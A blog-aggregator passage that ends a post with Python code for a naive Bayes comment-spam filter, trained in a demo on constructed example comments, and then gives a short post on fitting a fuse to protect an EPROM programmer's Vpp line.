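        return 1.0 / (1.0 + math.exp(log_g - log_b))   # prod(p) / (prod(p) + prod(1-p))

    def is_bogus(self, text, threshold=0.9):
        return self.score(text) >= threshold


def train_demo():
    """Filter trained on a small constructed corpus (not real comments)."""
    legit = [
        "Thanks for the post, the CPS soup section was really helpful.",
        "I hit the same stack limit in Racket; nice to see Guile remove it.",
        "Great write-up on the compiler, looking forward to native code.",
        "Does the new VM still bootstrap from C on ARM?",
    ]
    bogus = [
        "Buy cheap viagra online, best prices http://pills.example/buy",
        "cheap replica watches and bags, click here http://watches.example",
        "Check out the best online casino bonus http://casino.example",
        "Nice post! Buy cheap followers now http://followers.example",
    ]
    clf = CommentFilter()
    for text in legit:
        clf.train(text, False)
    for text in bogus:
        clf.train(text, True)
    return clf
```

With only eight training comments the one-sided features dominate, which is exactly the behaviour the post describes: a single token never seen on the legit side is enough to push a comment to the bogus end. The Git history gives the real filter thousands of examples on each side, so the both-sides ratio in p_bogus() does more of the work there.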

We'll see I guess. If your comment gets caught by my filters, let me know -- over email or Twitter I guess, since you might not be able to comment! I hope to be able to keep comments open; I've learned a lot from yall over the years.

by Andy Wingo

March 03, 2017

Museo dell Informatica funzionante

TOP2004 EPROM programmer: a simple mod!

Some time ago we explained how we fixed our TOP2004 EPROM programmer. We saw that if we plug a BAD EPROM into the socket, the current peak on the Vpp pin is too high and can burn the Vpp switching transistor in the programmer. A bad EPROM like that also gets quite hot, so you can even check by touch whether it’s good or not.

The maximum current for the Vpp switching transistor (MMBT3906) is 200 mA; we rarely saw an EPROM needing more than 100 mA on Vpp.

So we decided to mod our EPROM programmer to protect it from bad EPROMs: we just cut the Vpp trace and added a FUSE SOCKET for 100 mA fuses. Simple and effective!

The post TOP2004 EPROM programmer: a simple mod! appeared first on Museo dell'Informatica Funzionante.

by asbesto